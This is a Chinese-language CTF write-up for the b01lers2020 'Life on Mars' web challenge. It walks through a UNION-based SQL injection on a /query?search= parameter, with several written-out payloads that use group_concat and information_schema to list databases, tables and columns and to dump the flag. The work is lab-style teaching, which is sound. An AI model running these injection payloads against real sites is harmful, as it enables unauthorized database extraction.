[b01lers2020]Life on Mars

界面如下，点击可以看到各种信息，讲的是火星上的事物：
扫描一遍，没有发现任何东西：
并没有备份文件，猜测可能是一些框架的注入之类的，
在各页面抓包查看是否有可疑传参：

某一个页面，看到有类似查询的参数：

传参的数据如果是地名，则显示json形式的页面信息，尝试注入：
通过这个形式显示，信息：

尝试:

/query?search=amazonis_planitia union select version(),database()

将表名聚合在一起：爆出表名
对了，下面这是最常见的对没有过滤的sql注入进行查找的典型payload,用group_concat把某一信息聚合在一起，同时是从information_schema中查找，其是mysql自带的记录数据库元组字符规则的数据库，带有各种信息：

可以找到用户自己定义的表：

/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'

查表：

看不出什么，还是先爆其他的吧：

/query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.schemata

还是直接上代码爆出库名，和之前多出了两个库：

有个alien_code,可以看看;

/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'alien_code'

只有一个表叫’code’
继续查询表中字段：

/query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name = 'code'

有code和id两个字段，直接去code里面找：

/query?search=amazonis_planitia union select 1,group_concat(code) from alien_code.code

找到flag: